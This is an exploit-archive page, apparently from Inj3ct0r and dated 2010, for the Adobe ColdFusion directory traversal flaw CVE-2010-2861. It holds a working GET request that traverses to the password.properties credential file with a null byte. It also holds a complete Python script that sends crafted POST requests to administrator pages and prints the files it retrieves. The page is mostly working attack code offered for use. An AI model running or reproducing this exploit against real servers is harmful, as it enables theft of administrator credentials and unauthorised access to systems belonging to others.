Home / os / win7

Adobe ColdFusion Directory Traversal Vulnerability

Posted on 14 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Adobe ColdFusion Directory Traversal Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================
Adobe ColdFusion Directory Traversal Vulnerability
==================================================

#
Working GET request courtesy of carnal0wnage:
#
http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
#
 
 
#!/usr/bin/python
 
# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 
# leo 13.08.2010
 
import sys
import socket
import re
 
# in case some directories are blocked
filenames = (&quot;/CFIDE/wizards/common/_logintowizard.cfm&quot;, &quot;/CFIDE/administrator/archives/index.cfm&quot;, &quot;/cfide/install.cfm&quot;, &quot;/CFIDE/administrator/entman/index.cfm&quot;)
 
post = &quot;&quot;&quot;POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
 
locale=%%00%s%%00a&quot;&quot;&quot;
 
def main():
    if len(sys.argv) != 4:
        print &quot;usage: %s &lt;host&gt; &lt;port&gt; &lt;file_path&gt;&quot; % sys.argv[0]
        print &quot;example: %s localhost 80 ../../../../../../../lib/password.properties&quot; % sys.argv[0]
        print &quot;if successful, the file will be printed&quot;
        return
     
    host = sys.argv[1]
    port = sys.argv[2]
    path = sys.argv[3]
 
    for f in filenames:
        print &quot;------------------------------&quot;
        print &quot;trying&quot;, f
 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        s.send(post % (f, host, len(path) + 14, path))
 
        buf = &quot;&quot;
        while 1:
            buf_s = s.recv(1024)
            if len(buf_s) == 0:
                break
            buf += buf_s
        
        m = re.search('&lt;title&gt;(.*)&lt;/title&gt;', buf, re.S)
        if m != None:
            title = m.groups(0)[0]
            print &quot;title from server in %s:&quot; % f
            print &quot;------------------------------&quot;
            print m.groups(0)[0]
            print &quot;------------------------------&quot;
 
if __name__ == '__main__':
    main()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :